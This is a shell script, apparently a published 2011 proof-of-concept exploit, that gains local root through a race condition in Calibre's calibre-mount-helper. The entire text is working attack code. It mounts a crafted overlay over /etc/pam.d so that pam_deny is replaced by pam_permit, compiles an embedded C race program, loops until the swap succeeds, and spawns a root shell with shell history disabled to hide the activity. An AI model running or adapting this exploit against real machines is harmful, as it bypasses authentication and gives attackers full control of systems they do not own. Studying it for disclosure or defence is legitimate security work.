70calibrerassaultmount.sh


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

#!/bin/sh

             ###########################################
             #         .70-Calibrer Assault Mount      #
             #  by Dan Rosenberg (@djrbliss) and zx2c4 #
             ###########################################

################################################################################
# Yesterday we learned how Calibre's ability to mount anything anywhere resulted
# in a local root. Today's exploit shows a race condition to subvert recent
# changes preventing symlinks and checking path prefixes.
#
# - djrbliss & zx2c4
# 2011-11-3
################################################################################


overlay=/dev/shm/overlay
staging=/media/staging
mounter=calibre-mount-helper
fakemount=/media/staging/fake
target=/etc/pam.d
mkfsntfs=/sbin/mkfs.ntfs

echo "[+] Making overlay image:"
dd if=/dev/zero of=$overlay count=51200
$mkfsntfs -F $overlay

echo "[+] Mounting overlay image using calibre-mount-helper."
$mounter mount $overlay $staging

echo "[+] Copying /etc/pam.d/ into overlay."
cp /etc/pam.d/* $staging/ 2>/dev/null

sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth

echo "[*] Making fake mountpoint."
rm -rf $fakemount 2>/dev/null

echo "[*] Preparing binary payload..."

cat > /tmp/pwn.c << _EOF
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char **argv)
{

	int fd, wd, ret;

        if (fork()) {
                fd = inotify_init();

                unlink("$fakemount");
                mkdir("$fakemount");
                
                wd = inotify_add_watch(fd, "$fakemount", IN_CREATE);
                read(fd, 0, 0);
                
                rename("$fakemount", "$staging/tmp");
                symlink("$target", "$fakemount");
                rmdir("$staging/tmp");

                return 0;

	} else {
		sleep(1);
		return system("$mounter mount $overlay $fakemount");
	}
	return 0;
}
_EOF

gcc /tmp/pwn.c -o /tmp/pwn
ret=1
while [ $ret -ne 0 ]; do
	/tmp/pwn
	ret=$?
done;

sleep 2

echo "[+] Asking for root. When prompted for a password, type anything and press enter."
su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"